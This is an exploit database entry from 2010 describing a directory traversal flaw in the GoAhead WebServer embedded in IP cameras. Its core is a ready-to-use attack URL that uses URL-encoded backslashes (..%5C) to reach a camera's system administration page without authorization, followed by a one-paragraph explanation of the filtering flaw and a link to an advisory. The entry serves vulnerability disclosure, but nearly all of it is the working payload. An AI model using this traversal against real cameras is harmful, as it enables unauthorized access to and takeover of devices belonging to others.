GoAhead WebServer URL Encoded Slash Directory Traversal Vulnerability

2010-02-17T00:00:00
ID 1337DAY-ID-10948
Type zdt
Reporter William Reyor
Modified 2010-02-17T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================================
GoAhead WebServer URL Encoded Slash Directory Traversal Vulnerability
=====================================================================

simply go to http://ipaddress of
camera/..%5C..%5C..%5C..%5C..%5C..%5C/config/tcfg_system.asp (system
administration page)

These cams use an embedded version of GoAhead WebServer which is
vulnerable to the above attack because they don't correctly filter URL
encoded substitutions for the '/' character. Original vulnerability
and further explanation posted here:
http://www.securityfocus.com/bid/5197/info

William Reyor


-- 
Genius is one percent inspiration and ninety-nine percent perspiration.




#  0day.today [2018-03-14]  #